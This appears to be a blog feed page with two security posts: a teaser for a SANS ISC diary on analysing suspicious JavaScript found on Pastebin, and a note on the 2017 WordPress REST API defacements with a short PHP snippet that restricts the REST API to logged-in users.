I published the following diary on isc.sans.org: “Analysis of a Suspicious Piece of JavaScript“.

What to do on a cloudy, lazy Sunday? You go hunting and review some alerts generated by your robots. Pastebin remains one of my favourite playgrounds and you always find interesting stuff there. In a recent diary, I reported many malicious PE files stored in Base64 but, today, I found a suspicious piece of JavaScript code… [Read more]

[The post [SANS ISC Diary] Analysis of a Suspicious Piece of JavaScript has been first published on /dev/random]

February 11, 2017

After the PR beating WordPress took with the massive defacements of non-upgraded WordPress installations, it is time to revisit the core team's point of view that the REST API should be active for everyone and that no option should be provided to disable it (as per the "decisions, not options" philosophy). I, for one, installed the “Disable REST API” plugin.
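For those who prefer a few lines of code over another plugin, roughly the same effect can be obtained with WordPress's rest_authentication_errors filter. This is a minimal sketch of the commonly used approach, restricting the REST API to logged-in users; it is not the plugin's actual implementation:

<?php
// Drop this in a small (mu-)plugin: reject anonymous REST API requests.
add_filter('rest_authentication_errors', function ($result) {
    // Respect errors already raised by other authentication handlers.
    if (!empty($result)) {
        return $result;
    }
    // Block requests from visitors who are not logged in.
    if (!is_user_logged_in()) {
        return new WP_Error(
            'rest_disabled',
            'The REST API is restricted to authenticated users.',
            array('status' => 401)
        );
    }
    return $result;
});

Note that this restricts rather than fully removes the API, so the admin and logged-in consumers keep working.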
